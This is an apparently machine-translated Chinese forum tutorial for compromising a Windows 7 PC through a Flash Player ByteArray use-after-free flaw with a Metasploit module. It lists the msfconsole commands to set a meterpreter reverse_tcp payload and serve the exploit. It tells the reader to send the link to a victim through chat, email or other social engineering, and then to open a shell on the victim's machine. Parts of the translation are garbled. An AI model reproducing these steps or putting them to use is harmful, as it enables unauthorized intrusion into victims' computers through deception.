使用Adobe Flash Player Byte数组利用远程PC与工作人员免费使用

此模块利用Adobe Flash Player中的免费漏洞后使用。当分配给当前ApplicationDomain的ByteArray从ActionScript工作程序中释放时,会发生此漏洞,该工作程序可以填充内存并通知主线程损坏新内容。该模块已在Windows 7 SP1(32位),IE 8至IE 11和Flash 16.0.0.296上成功测试。
利用目标
Windows 7的
Flash 16.0.0.296。
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
现在输入  exploit exploit / windows / browser / adobe_flash_worker_byte_array_uaf
msf exploit(adobe_flash_worker_byte_array_uaf)> 设置有效负载windows / meterpreter / reverse_tcp
msf exploit(adobe_flash_worker_byte_array_uaf)> set lhost 192.168.1.11  (本地主机的IP)
msf exploit(adobe_flash_worker_byte_array_uaf)> set srvhost 192.168.1.11
msf exploit(adobe_flash_worker_byte_array_uaf)> set uripath /
msf exploit(adobe_flash_worker_byte_array_uaf)> exploit
现在你应该给你的受害者一个URL http://192.168.1.11:8080
通过聊天或电子邮件或任何社会工程技术将服务器的链接发送给受害者
现在,当受害者打开以下链接http://192.168.1.11:8080
现在键入session -l以显示受害者打开链接时打开的会话
现在会话已打开类型sysinfo以获取系统信息,然后键入shell进入
受害者命令提示。
转载请注明本文链接: http://www.mayidui.net/t2278.html
话题: 渗透 教程
游客
登录后才可以回帖,登录 或者 注册